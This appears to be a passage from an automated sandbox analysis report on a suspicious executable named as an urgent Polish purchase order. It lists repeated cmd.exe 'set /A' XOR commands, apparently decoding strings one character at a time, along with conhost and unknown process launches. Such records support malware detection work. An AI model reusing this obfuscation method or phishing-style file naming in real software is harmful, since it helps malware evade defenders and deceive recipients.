            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
